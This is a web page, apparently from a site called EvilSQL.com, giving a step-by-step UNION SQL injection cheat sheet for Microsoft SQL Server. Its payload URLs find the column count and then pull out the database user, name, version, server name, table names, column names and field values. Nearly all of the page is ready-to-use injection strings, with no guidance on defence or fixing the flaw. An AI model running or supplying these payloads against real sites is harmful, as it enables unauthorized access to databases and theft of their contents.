Syler.Grey[at]gmail.com
| Microsoft SQL Blind Exploit | Microsoft SQL Error Exploit | Microsoft SQL Union Exploit |
DOM Cross Site Scripting Exploit | Simple AJAX Request Example |

UNION SQL INJECTION - DETECTION
 
Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR

 

UNION SQL INJECTION - EXTRACT DATABASE USER
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--

[DB USER]

 

UNION SQL INJECTION - EXTRACT DATABASE NAME
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--

[DB NAME]

 

UNION SQL INJECTION - EXTRACT DATABASE VERSION
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--

[DB VERSION]

 

UNION SQL INJECTION - EXTRACT SERVER NAME
   
http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--

[SERVER NAME]

 

UNION SQL INJECTION - EXTRACT DATABASE TABLES
 
http://[site]/page.asp?id=1  UNION SELECT ALL 1,
name,3,4 from sysobjects where xtype=char(85)--

[TABLE NAME 1]

 

UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES
 
http://[site]/page.asp?id=1  UNION SELECT ALL 1,
column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--

[COLUMN NAME  1]

 

UNION SQL INJECTION - EXTRACT 1st FIELD
   
http://[site]/page.asp?id=1  UNION SELECT ALL 1,
COLUMN-NAME-1,3,4 from TABLE-NAME-1--

[FIELD 1 VALUE]

 

UNION SQL INJECTION - EXTRACT 2nd FIELD
 
http://[site]/page.asp?id=
1  UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1-- 

[FIELD 2 VALUE]

 

UNION SQL INJECTION - EXTRACT 3nd FIELD
 
http://[site]/page.asp?id=
1  UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--

[FIELD 3 VALUE]

 


This website is available for your personal use and viewing. Access and use by you of this site constitutes acceptance by you of these Terms and Conditions that take effect from the date of first use. You agree to use this website only for lawful purposes, and in a manner that does not infringe the rights of, or restrict or inhibit the use and enjoyment of this site by any other third party.

EvilSQL.com shall have no liability to any person for the accuracy or contents of the security advice published on this website. EvilSQL.com assumes no responsibility to any person. No warranties are given. No liability is accepted for any inclusion or omission herefrom or the absence of any other information or matter. Furthermore, no liability or responsibility is accepted for any further advice given or omission to give further advice, prior to or subsequent to the advice published on this website.